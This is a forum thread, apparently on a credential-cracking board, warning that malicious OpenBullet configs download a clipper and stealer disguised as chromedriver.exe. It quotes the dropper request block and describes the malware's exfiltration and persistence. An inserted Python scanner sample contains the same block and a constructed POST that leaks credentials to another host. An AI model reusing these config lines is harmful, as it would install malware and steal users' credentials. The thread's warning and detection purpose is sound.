Beware of malicious/infected configs

by Liars - 23 June, 2020 - 10:18 AM
#9 P6AK:
With this I also recommend only using .anom configs, because the encryption of .loli and .loliX configs can be used to hide this malware!
 
#10 kobra:
Thank you very much for the information
#11 noarch:
(23 June, 2020 - 10:18 AM) Ulysses Wrote:
We have noticed an increased volume of malicious OpenBullet configs lately.
Like many other malware-related incidents, the attacker uses compromised accounts to spread and to reply to their threads.
Unlike other malware, a malicious config won't have any detection on VirusTotal because there is no code being executed; it's text.
In other words, VirusTotal isn't aware that your config will be loaded on OpenBullet, and it will be translated to a set of instructions.

The malware attack vector is a malicious GET request, and it looks like this:
Code:
REQUEST GET "https://site.com/config/API"

HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"
-> FILE "bin/chromedriver.exe"

The GET request leads to the payload "API" being downloaded with no extension into the folder "bin", and then renamed to "chromedriver.exe".
So far, we have seen this malware change the victim's clipboarded Bitcoin address (clipper) and read numerous files containing system information (stealer).
The malware logs the victim's IP address and sends the stolen data to a Telegram bot. Persistence is granted through a task in the Windows Task Scheduler.

At any time, the malware may change depending on the attacker's needs. Here are a few steps you can take to step up your security:

(1) Enable Two Factor Authentication. It will prevent your account from being accessed if your logins have been stolen.
(2) Do not access Cracked on a virtual machine, or a remote desktop, where you usually run potentially malicious files.
(3) Read your config with any text editor to check for any malicious requests, like malware (GET requests) or hitloggers (POST requests).

Last but not least, report malicious configs.

Thanks for the info.
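Step (3) in the quoted post, reading the config for stray GET and POST requests, is something a script can do. The following is an added example, not code from this thread or from OpenBullet: a small Python checker for config text in the syntax quoted above that reports every response saved to disk with "-> FILE" and every POST sent to a host other than the config's target. The sample config, the login request and the hostnames other than the one quoted from the post are constructed.

```python
import re
from urllib.parse import urlparse

# Constructed sample in the LoliScript-style syntax quoted in the thread: a normal
# login request to the config's target, the dropper block from the post, and a
# POST that copies the credentials to a third-party host (a "hitlogger").
SAMPLE_CONFIG = """\
REQUEST POST "https://target.example/login"
  CONTENT "user=<USER>&pass=<PASS>"
REQUEST GET "https://site.com/config/API"
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
  HEADER "Pragma: no-cache"
  HEADER "Accept: */*"
  -> FILE "bin/chromedriver.exe"
REQUEST POST "https://logs.example.net/collect"
  CONTENT "u=<USER>&p=<PASS>"
"""

REQUEST_RE = re.compile(r'^\s*REQUEST\s+(\w+)\s+"([^"]+)"', re.IGNORECASE)
FILE_RE = re.compile(r'^\s*->\s*FILE\s+"([^"]+)"', re.IGNORECASE)
EXECUTABLE = (".exe", ".dll", ".bat", ".cmd", ".ps1", ".scr", ".vbs", ".js")

def scan_config(text):
    """Return [(line_no, reason), ...]. The host of the first REQUEST is taken as
    the site the config targets; a POST anywhere else looks like a hitlogger, and
    any '-> FILE' sink is reported since a checker never needs to save a response."""
    findings = []
    target_host = None
    method, url, req_line = None, None, 0
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.match(line)
        if m:
            method, url, req_line = m.group(1).upper(), m.group(2), n
            host = urlparse(url).hostname
            if target_host is None:
                target_host = host
            elif method == "POST" and host != target_host:
                findings.append((n, f"POST to third-party host {host} (possible hitlogger)"))
            continue
        m = FILE_RE.match(line)
        if m:
            path = m.group(1)
            what = "executable" if path.lower().endswith(EXECUTABLE) else "file"
            findings.append((req_line, f"{method} {url} saved to disk as {what} {path!r}"))
    return findings

if __name__ == "__main__":
    for line_no, reason in scan_config(SAMPLE_CONFIG):
        print(f"line {line_no}: {reason}")
```

Run it over a downloaded config before loading it; an empty result only means neither pattern was found, so still read the file.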
#12 SHAMASH:
Thanks for the alert. I suggest making the configs section only for members with enough likes, reputation or rank, to keep the content quality clean and safe.
#13 montyPY:
(This post was last modified: 24 June, 2020 - 03:16 PM by montyPY.)
I remember reporting such a config and the poster didn't even get a ban.
#14 warsnoop:
(23 June, 2020 - 10:18 AM) Ulysses Wrote: (quote as in #11)

I don't understand, how does the exe file auto-execute??
 
#16 warsnoop:
(24 June, 2020 - 09:27 PM) Ulysses Wrote:
(24 June, 2020 - 09:06 PM) Warsnooop Wrote:
(23 June, 2020 - 10:18 AM) Ulysses Wrote: (quote as in #11)

I don't understand, how does the exe file auto-execute??

OpenBullet uses chromedriver.exe.

Oh so every time we run OpenBullet it will execute. Damnnn, the guy who got the idea is a Big Brainn xD
 
